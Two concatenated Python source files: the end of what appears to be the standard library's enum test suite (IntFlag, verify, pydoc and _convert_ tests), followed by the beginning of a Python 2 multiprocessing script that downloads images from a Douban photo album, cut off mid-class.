self.assertEqual(repr(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '0x0')
self.assertEqual(repr(~(Perm.R | 8)), '-13')
self.assertEqual(repr(Perm(~0)), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm(~8)), '-9')
Open = self.Open
self.assertEqual(repr(Open.RO), 'Open.RO')
self.assertEqual(repr(Open.WO), 'Open.WO')
self.assertEqual(repr(Open.AC), 'Open.AC')
self.assertEqual(repr(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(repr(Open.WO | Open.CE), 'Open.WO|Open.CE')
self.assertEqual(repr(Open(4)), '4')
self.assertEqual(repr(~Open.RO), 'Open.WO|Open.RW|Open.CE')
self.assertEqual(repr(~Open.WO), 'Open.RW|Open.CE')
self.assertEqual(repr(~Open.AC), 'Open.CE')
self.assertEqual(repr(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(repr(~(Open.WO | Open.CE)), 'Open.RW')
self.assertEqual(repr(Open(~4)), '-5')
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), '4')
self.assertEqual(format(Perm.R | Perm.X, ''), '5')
#
class NewPerm(IntFlag):
R = 1 << 2
W = 1 << 1
X = 1 << 0
def __str__(self):
return self._name_
self.assertEqual(format(NewPerm.R, ''), 'R')
self.assertEqual(format(NewPerm.R | Perm.X, ''), 'R|X')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i | j, i.value | j.value)
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for j in range(8):
self.assertEqual(i | j, i.value | j)
self.assertEqual((i | j).value, i.value | j)
self.assertIs(type(i | j), Perm)
self.assertEqual(j | i, j | i.value)
self.assertEqual((j | i).value, j | i.value)
self.assertIs(type(j | i), Perm)
for i in Perm:
self.assertIs(i | i, i)
self.assertIs(i | 0, i)
self.assertIs(0 | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j))
for j in range(8):
self.assertEqual(i & j, i.value & j)
self.assertEqual((i & j).value, i.value & j)
self.assertIs(type(i & j), Perm)
self.assertEqual(j & i, j & i.value)
self.assertEqual((j & i).value, j & i.value)
self.assertIs(type(j & i), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & 7, i)
self.assertIs(7 & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i ^ j, i.value ^ j.value)
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for j in range(8):
self.assertEqual(i ^ j, i.value ^ j)
self.assertEqual((i ^ j).value, i.value ^ j)
self.assertIs(type(i ^ j), Perm)
self.assertEqual(j ^ i, j ^ i.value)
self.assertEqual((j ^ i).value, j ^ i.value)
self.assertIs(type(j ^ i), Perm)
for i in Perm:
self.assertIs(i ^ 0, i)
self.assertIs(0 ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertEqual(~i, (~i).value)
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_boundary(self):
self.assertIs(enum.IntFlag._boundary_, EJECT)
class Iron(IntFlag, boundary=STRICT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Iron._boundary_, STRICT)
#
class Water(IntFlag, boundary=CONFORM):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Water._boundary_, CONFORM)
#
class Space(IntFlag, boundary=EJECT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Space._boundary_, EJECT)
#
#
class Bizarre(IntFlag, boundary=KEEP):
b = 3
c = 4
d = 6
#
self.assertRaisesRegex(ValueError, 'invalid value: 5', Iron, 5)
#
self.assertIs(Water(7), Water.ONE|Water.TWO)
self.assertIs(Water(~9), Water.TWO)
#
self.assertEqual(Space(7), 7)
self.assertTrue(type(Space(7)) is int)
#
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertIs(Bizarre(3), Bizarre.b)
self.assertIs(Bizarre(6), Bizarre.d)
def test_iter(self):
Color = self.Color
Open = self.Open
self.assertEqual(list(Color), [Color.RED, Color.GREEN, Color.BLUE])
self.assertEqual(list(Open), [Open.WO, Open.RW, Open.CE])
    def test_programmatic_function_string(self):
Perm = IntFlag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
    def test_programmatic_function_string_with_start(self):
Perm = IntFlag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
    def test_programmatic_function_string_list(self):
Perm = IntFlag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
    def test_programmatic_function_iterable(self):
Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
    def test_programmatic_function_from_dict(self):
Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
    def test_programmatic_function_from_empty_list(self):
Perm = enum.IntFlag('Perm', [])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', [])
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
    def test_programmatic_function_from_empty_tuple(self):
Perm = enum.IntFlag('Perm', ())
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', ())
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
@unittest.skipIf(
python_version >= (3, 12),
'__contains__ now returns True/False for all inputs',
)
def test_contains_er(self):
Open = self.Open
Color = self.Color
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertFalse(Color.GREEN in Open)
self.assertFalse(Open.RW in Color)
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'GREEN' in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'RW' in Open
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
2 in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
2 in Open
@unittest.skipIf(
python_version < (3, 12),
        '__contains__ only works with enum members before 3.12',
)
def test_contains_tf(self):
Open = self.Open
Color = self.Color
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertTrue(Color.GREEN in Open)
self.assertTrue(Open.RW in Color)
self.assertFalse('GREEN' in Color)
self.assertFalse('RW' in Open)
self.assertTrue(2 in Color)
self.assertTrue(2 in Open)
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
with self.assertRaises(TypeError):
self.assertFalse('test' in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.BLACK), [])
self.assertEqual(list(Color.PURPLE), [Color.RED, Color.BLUE])
self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
def test_member_length(self):
self.assertEqual(self.Color.__len__(self.Color.BLACK), 0)
self.assertEqual(self.Color.__len__(self.Color.GREEN), 1)
self.assertEqual(self.Color.__len__(self.Color.PURPLE), 2)
self.assertEqual(self.Color.__len__(self.Color.BLANCO), 3)
def test_aliases(self):
Color = self.Color
self.assertEqual(Color(1).name, 'RED')
self.assertEqual(Color['ROJO'].name, 'RED')
self.assertEqual(Color(7).name, 'WHITE')
self.assertEqual(Color['BLANCO'].name, 'WHITE')
self.assertIs(Color.BLANCO, Color.WHITE)
Open = self.Open
self.assertIs(Open['AC'], Open.AC)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(AllMixin, StrMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(IntFlag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
        # check that the racing threads created each composite member only once
        # (248 composite + 8 canonical = 256 distinct objects)
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestEmptyAndNonLatinStrings(unittest.TestCase):
def test_empty_string(self):
with self.assertRaises(ValueError):
empty_abc = Enum('empty_abc', ('', 'B', 'C'))
def test_non_latin_character_string(self):
greek_abc = Enum('greek_abc', ('\u03B1', 'B', 'C'))
item = getattr(greek_abc, '\u03B1')
self.assertEqual(item.value, 1)
def test_non_latin_number_string(self):
hebrew_123 = Enum('hebrew_123', ('\u05D0', '2', '3'))
item = getattr(hebrew_123, '\u05D0')
self.assertEqual(item.value, 1)
class TestUnique(unittest.TestCase):
def test_unique_clean(self):
@unique
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
#
@unique
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@unique
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@unique
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@verify(UNIQUE)
class Silly(Enum):
one = 1
two = 'dos'
name = 3
#
@verify(UNIQUE)
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
class TestVerify(unittest.TestCase):
def test_continuous(self):
@verify(CONTINUOUS)
class Auto(Enum):
FIRST = auto()
SECOND = auto()
THIRD = auto()
FORTH = auto()
#
@verify(CONTINUOUS)
class Manual(Enum):
FIRST = 3
SECOND = 4
THIRD = 5
FORTH = 6
#
with self.assertRaisesRegex(ValueError, 'invalid enum .Missing.: missing values 5, 6, 7, 8, 9, 10, 12'):
@verify(CONTINUOUS)
class Missing(Enum):
FIRST = 3
SECOND = 4
THIRD = 11
FORTH = 13
#
with self.assertRaisesRegex(ValueError, 'invalid flag .Incomplete.: missing values 32'):
@verify(CONTINUOUS)
class Incomplete(Flag):
FIRST = 4
SECOND = 8
THIRD = 16
FORTH = 64
#
with self.assertRaisesRegex(ValueError, 'invalid flag .StillIncomplete.: missing values 16'):
@verify(CONTINUOUS)
class StillIncomplete(Flag):
FIRST = 4
SECOND = 8
THIRD = 11
FORTH = 32
def test_composite(self):
class Bizarre(Flag):
b = 3
c = 4
d = 6
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertEqual(Bizarre.b.value, 3)
self.assertEqual(Bizarre.c.value, 4)
self.assertEqual(Bizarre.d.value, 6)
with self.assertRaisesRegex(
ValueError,
"invalid Flag 'Bizarre': aliases b and d are missing combined values of 0x3 .use enum.show_flag_values.value. for details.",
):
@verify(NAMED_FLAGS)
class Bizarre(Flag):
b = 3
c = 4
d = 6
#
self.assertEqual(enum.show_flag_values(3), [1, 2])
class Bizarre(IntFlag):
b = 3
c = 4
d = 6
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertEqual(Bizarre.b.value, 3)
self.assertEqual(Bizarre.c.value, 4)
self.assertEqual(Bizarre.d.value, 6)
with self.assertRaisesRegex(
ValueError,
"invalid Flag 'Bizarre': alias d is missing value 0x2 .use enum.show_flag_values.value. for details.",
):
@verify(NAMED_FLAGS)
class Bizarre(IntFlag):
c = 4
d = 6
self.assertEqual(enum.show_flag_values(2), [2])
def test_unique_clean(self):
@verify(UNIQUE)
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
#
@verify(UNIQUE)
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@verify(UNIQUE)
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@verify(UNIQUE)
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@verify(UNIQUE)
class Silly(Enum):
one = 1
two = 'dos'
name = 3
#
@verify(UNIQUE)
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
class TestHelpers(unittest.TestCase):
sunder_names = '_bad_', '_good_', '_what_ho_'
dunder_names = '__mal__', '__bien__', '__que_que__'
private_names = '_MyEnum__private', '_MyEnum__still_private'
private_and_sunder_names = '_MyEnum__private_', '_MyEnum__also_private_'
random_names = 'okay', '_semi_private', '_weird__', '_MyEnum__'
def test_sunder(self):
for name in self.sunder_names + self.private_and_sunder_names:
            self.assertTrue(enum._is_sunder(name), '%r is not a sunder name?' % name)
for name in self.dunder_names + self.private_names + self.random_names:
self.assertFalse(enum._is_sunder(name), '%r is a sunder name?' % name)
def test_dunder(self):
for name in self.dunder_names:
            self.assertTrue(enum._is_dunder(name), '%r is not a dunder name?' % name)
for name in self.sunder_names + self.private_names + self.private_and_sunder_names + self.random_names:
self.assertFalse(enum._is_dunder(name), '%r is a dunder name?' % name)
def test_is_private(self):
for name in self.private_names + self.private_and_sunder_names:
            self.assertTrue(enum._is_private('MyEnum', name), '%r is not a private name?' % name)
        for name in self.sunder_names + self.dunder_names + self.random_names:
            self.assertFalse(enum._is_private('MyEnum', name), '%r is a private name?' % name)
class TestEnumTypeSubclassing(unittest.TestCase):
pass
expected_help_output_with_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1, boundary=None)
|\x20\x20
| An enumeration.
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = Color.blue
|\x20\x20
| green = Color.green
|\x20\x20
| red = Color.red
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
| The name of the Enum member.
|\x20\x20
| value
| The value of the Enum member.
|\x20\x20
| ----------------------------------------------------------------------
| Readonly properties inherited from enum.EnumType:
|\x20\x20
| __members__
| Returns a mapping of member name->value.
|\x20\x20\x20\x20\x20\x20
| This mapping lists all enum members, including aliases. Note that this
| is a read-only view of the internal mapping."""
expected_help_output_without_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = Color.blue
|\x20\x20
| green = Color.green
|\x20\x20
| red = Color.red
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
|\x20\x20
| value
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumType:
|\x20\x20
| __members__"""
class TestStdLib(unittest.TestCase):
maxDiff = None
class Color(Enum):
red = 1
green = 2
blue = 3
def test_pydoc(self):
# indirectly test __objclass__
if StrEnum.__doc__ is None:
expected_text = expected_help_output_without_docs % __name__
else:
expected_text = expected_help_output_with_docs % __name__
output = StringIO()
helper = pydoc.Helper(output=output)
helper(self.Color)
result = output.getvalue().strip()
self.assertEqual(result, expected_text)
def test_inspect_getmembers(self):
values = dict((
('__class__', EnumType),
('__doc__', 'An enumeration.'),
('__members__', self.Color.__members__),
('__module__', __name__),
('blue', self.Color.blue),
('green', self.Color.green),
('name', Enum.__dict__['name']),
('red', self.Color.red),
('value', Enum.__dict__['value']),
))
result = dict(inspect.getmembers(self.Color))
self.assertEqual(set(values.keys()), set(result.keys()))
failed = False
for k in values.keys():
if result[k] != values[k]:
print()
print('\n%s\n key: %s\n result: %s\nexpected: %s\n%s\n' %
('=' * 75, k, result[k], values[k], '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
def test_inspect_classify_class_attrs(self):
# indirectly test __objclass__
from inspect import Attribute
values = [
Attribute(name='__class__', kind='data',
defining_class=object, object=EnumType),
Attribute(name='__doc__', kind='data',
defining_class=self.Color, object='An enumeration.'),
Attribute(name='__members__', kind='property',
defining_class=EnumType, object=EnumType.__members__),
Attribute(name='__module__', kind='data',
defining_class=self.Color, object=__name__),
Attribute(name='blue', kind='data',
defining_class=self.Color, object=self.Color.blue),
Attribute(name='green', kind='data',
defining_class=self.Color, object=self.Color.green),
Attribute(name='red', kind='data',
defining_class=self.Color, object=self.Color.red),
Attribute(name='name', kind='data',
defining_class=Enum, object=Enum.__dict__['name']),
Attribute(name='value', kind='data',
defining_class=Enum, object=Enum.__dict__['value']),
]
values.sort(key=lambda item: item.name)
result = list(inspect.classify_class_attrs(self.Color))
result.sort(key=lambda item: item.name)
self.assertEqual(
len(values), len(result),
"%s != %s" % ([a.name for a in values], [a.name for a in result])
)
failed = False
for v, r in zip(values, result):
if r != v:
print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
def test_test_simple_enum(self):
@_simple_enum(Enum)
class SimpleColor:
RED = 1
GREEN = 2
BLUE = 3
class CheckedColor(Enum):
RED = 1
GREEN = 2
BLUE = 3
self.assertTrue(_test_simple_enum(CheckedColor, SimpleColor) is None)
SimpleColor.GREEN._value_ = 9
self.assertRaisesRegex(
TypeError, "enum mismatch",
_test_simple_enum, CheckedColor, SimpleColor,
)
class CheckedMissing(IntFlag, boundary=KEEP):
SIXTY_FOUR = 64
ONE_TWENTY_EIGHT = 128
TWENTY_FORTY_EIGHT = 2048
ALL = 2048 + 128 + 64 + 12
CM = CheckedMissing
self.assertEqual(list(CheckedMissing), [CM.SIXTY_FOUR, CM.ONE_TWENTY_EIGHT, CM.TWENTY_FORTY_EIGHT])
#
@_simple_enum(IntFlag, boundary=KEEP)
class Missing:
SIXTY_FOUR = 64
ONE_TWENTY_EIGHT = 128
TWENTY_FORTY_EIGHT = 2048
ALL = 2048 + 128 + 64 + 12
M = Missing
self.assertEqual(list(CheckedMissing), [M.SIXTY_FOUR, M.ONE_TWENTY_EIGHT, M.TWENTY_FORTY_EIGHT])
#
_test_simple_enum(CheckedMissing, Missing)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
support.check__all__(self, enum, not_exported={'bin', 'show_flag_values'})
# These are unordered here on purpose to ensure that declaration order
# makes no difference.
CONVERT_TEST_NAME_D = 5
CONVERT_TEST_NAME_C = 5
CONVERT_TEST_NAME_B = 5
CONVERT_TEST_NAME_A = 5 # This one should sort first.
CONVERT_TEST_NAME_E = 5
CONVERT_TEST_NAME_F = 5
CONVERT_STRING_TEST_NAME_D = 5
CONVERT_STRING_TEST_NAME_C = 5
CONVERT_STRING_TEST_NAME_B = 5
CONVERT_STRING_TEST_NAME_A = 5 # This one should sort first.
CONVERT_STRING_TEST_NAME_E = 5
CONVERT_STRING_TEST_NAME_F = 5
class TestIntEnumConvert(unittest.TestCase):
def setUp(self):
# Reset the module-level test variables to their original integer
# values, otherwise the already created enum values get converted
# instead.
for suffix in ['A', 'B', 'C', 'D', 'E', 'F']:
globals()[f'CONVERT_TEST_NAME_{suffix}'] = 5
globals()[f'CONVERT_STRING_TEST_NAME_{suffix}'] = 5
def test_convert_value_lookup_priority(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# We don't want the reverse lookup value to vary when there are
# multiple possible names for a given value. It should always
        # report the lexicographically first name in that case.
self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A')
def test_convert(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_TEST_NAME_F,
test_type.CONVERT_TEST_NAME_A)
self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5)
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')],
[], msg='Names other than CONVERT_TEST_* found.')
@unittest.skipUnless(python_version == (3, 8),
'_convert was deprecated in 3.8')
def test_convert_warn(self):
with self.assertWarns(DeprecationWarning):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
@unittest.skipUnless(python_version >= (3, 9),
'_convert was removed in 3.9')
def test_convert_raise(self):
with self.assertRaises(AttributeError):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
def test_convert_repr_and_str(self):
module = ('test.test_enum', '__main__')[__name__=='__main__']
test_type = enum.IntEnum._convert_(
'UnittestConvert',
module,
filter=lambda x: x.startswith('CONVERT_STRING_TEST_'))
self.assertEqual(repr(test_type.CONVERT_STRING_TEST_NAME_A), '%s.CONVERT_STRING_TEST_NAME_A' % module)
self.assertEqual(str(test_type.CONVERT_STRING_TEST_NAME_A), 'CONVERT_STRING_TEST_NAME_A')
self.assertEqual(format(test_type.CONVERT_STRING_TEST_NAME_A), '5')
# global names for StrEnum._convert_ test
CONVERT_STR_TEST_2 = 'goodbye'
CONVERT_STR_TEST_1 = 'hello'
class TestStrEnumConvert(unittest.TestCase):
def setUp(self):
global CONVERT_STR_TEST_1
global CONVERT_STR_TEST_2
CONVERT_STR_TEST_2 = 'goodbye'
CONVERT_STR_TEST_1 = 'hello'
def test_convert(self):
test_type = enum.StrEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_STR_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_STR_TEST_1, 'hello')
self.assertEqual(test_type.CONVERT_STR_TEST_2, 'goodbye')
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')],
[], msg='Names other than CONVERT_STR_* found.')
def test_convert_repr_and_str(self):
module = ('test.test_enum', '__main__')[__name__=='__main__']
test_type = enum.StrEnum._convert_(
'UnittestConvert',
module,
filter=lambda x: x.startswith('CONVERT_STR_'))
self.assertEqual(repr(test_type.CONVERT_STR_TEST_1), '%s.CONVERT_STR_TEST_1' % module)
self.assertEqual(str(test_type.CONVERT_STR_TEST_2), 'goodbye')
self.assertEqual(format(test_type.CONVERT_STR_TEST_1), 'hello')
if __name__ == '__main__':
unittest.main()
|
DownloadAlbum_withoutpool.py
|
#coding:utf-8
from __future__ import print_function
import multiprocessing
from bs4 import BeautifulSoup
import os, time, random, urllib
def getHtmlSoup(url):
page = urllib.urlopen(url)
html = page.read()
Soup = BeautifulSoup(html, 'lxml')
return Soup
def getNextpageurl(url):
Soup = getHtmlSoup(url)
nextpagetag = Soup.select('#content > div > div.article > div.paginator > span.next > a')
if nextpagetag:
nextpageurl = nextpagetag[0].get('href')
# print(nextpageurl)
return nextpageurl
else:
return False
def getAllPreviewpage(url):
allPageUrl = [url]
nexturl = url
while nexturl:
nexturl = getNextpageurl(nexturl)
if nexturl:
allPageUrl.append(nexturl)
return allPageUrl
def getCurrrntpageImageUrl(url, pagenumber, foldername):
Soup = getHtmlSoup(url)
photocount = 0
previewtags = Soup.select('#content > div.grid-16-8.clearfix > div.article > div.photolst.clearfix > div > a')
if previewtags:
for i in previewtags:
largeimghref = i.get('href')
Soup = getHtmlSoup(largeimghref)
imgsrctag = Soup.select('#link-report > div.image-show > div > a > img')
imgsrc = imgsrctag[0].get('src')
# print(imgsrc)
# time.sleep(2)
photocount += 1
filename = photocount + pagenumber * 18
path = 'doubanPhotos/%s/' % foldername
if not os.path.exists(path):
os.makedirs(path)
target = path + '%s.jpg' % filename
urllib.urlretrieve(imgsrc, target)
print("正在下载图片%s" % target)
countQueue.put(photocount)
print("--------------------------------------------------\n"
"这里是第%s页的进程 ID:%s\n"
"--------------------------------------------------\n" % (pagenumber + 1, os.getpid()))
print(time.strftime("%Y-%m-%d %A %X %Z", time.localtime()))
# return photocount
def DownloadPhotos(url, foldername):
Allpreviewpagelist = getAllPreviewpage(url)
pagenumber = len(Allpreviewpagelist)
photocount = 0
global countQueue
countQueue = multiprocessing.Queue()
# for i in range(pagenumber):
# photocount += getCurrrntpageImageUrl(Allpreviewpagelist[i], i, foldername)
#
downloadphoto = multiProcess(getCurrrntpageImageUrl, Allpreviewpagelist, pagenumber)
downloadphoto.downloadworks(foldername)
    # Collect each page's photo count from the page worker processes via the inter-process queue
for i in range(pagenumber):
photocount += countQueue.get(True)
print("这个相册有 %s 张图片" % photocount)
class multiProcess(multiprocessing.Process):
"""docstring for multiProcess"""
def __init__(self, func, arg, worknum):
super(multiProcess, self).__init__()
self.func = func
self.arg = arg
